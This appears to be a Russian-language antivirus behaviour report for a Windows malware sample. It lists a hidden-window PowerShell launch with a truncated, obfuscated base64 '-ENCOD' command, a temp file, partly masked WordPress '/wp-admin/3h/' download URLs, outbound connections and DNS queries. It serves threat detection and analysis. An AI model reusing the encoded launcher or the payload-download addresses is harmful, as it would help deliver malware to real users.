Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBJAHQARQBNACAAKAAiAFYAYQByAEkAQQBCACIAKwAiAEwAZQAiACsAIgA6ACIAKwAiAHUAdABXAEYAcAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAnAHMAWQBzAHQAZQBNACcAKwAnAC4ASQBPAC4AJwArACcARA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\643613.cvr
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- 'my######egalservices.com':80
- 'cl###myplace.in':443
- 'di###ocs.com.br':80
- http://my######egalservices.com/wp-admin/3h/
- http://www.my######egalservices.com/wp-admin/3h/
- '34.##9.100.209':443
- 'cl###myplace.in':443
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK my######egalservices.com
- DNS ASK da###nsight.kr
- DNS ASK cl###myplace.in
- DNS ASK ne#.##mmuscle.tk
- DNS ASK th###hotel.com
- DNS ASK di###ocs.com.br
- DNS ASK ed##a2.com
- DNS ASK ch####iansutter.ch
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBlAHQALQBJAHQARQBNACAAKAAiAFYAYQByAEkAQQBCACIAKwAiAEwAZQAiACsAIgA6ACIAKwAiAHUAdABXAEYAcAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAnAHMAWQBzAHQAZQBNACcAKwAnAC4ASQBPAC4AJwArACcARA... (со скрытым окном)